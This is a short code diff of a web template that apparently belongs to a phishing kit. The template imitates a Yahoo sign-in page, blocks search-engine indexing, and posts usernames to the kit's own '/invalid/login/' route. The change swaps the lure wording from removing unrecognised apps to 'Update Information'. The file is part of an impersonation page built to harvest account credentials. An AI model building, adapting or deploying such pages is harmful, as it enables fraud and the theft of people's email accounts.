--- a/views/yahoo-pass-invalid.ejs
+++ b/views/yahoo-pass-invalid.ejs
@@ -1,7 +1,7 @@
 <html class="grid no-js light-theme" id="html">
 
 <head>
-  <title>Yahoo - Remove unrecognize app(s)</title>
+  <title>Yahoo - Update Information</title>
   <meta name="robots" content="noindex,nofollow">
   <meta name="googlebot" content="noindex">
   <meta name="viewport" content="initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no">
@@ -1688,7 +1688,7 @@
             Sign in to
           </strong>
           <span class="challenge-desc signin-sub-title">
-            remove any unrecognize app(s)
+            Update Information
           </span>
           <form id="login-username-form" action="/invalid/login/<%= page2load %>/<%= count %>" method="post" class="no-img-label-space">
             <div id="username-country-code-field" class="username-country-code cci-dropdown-disabled code-of-length-1">
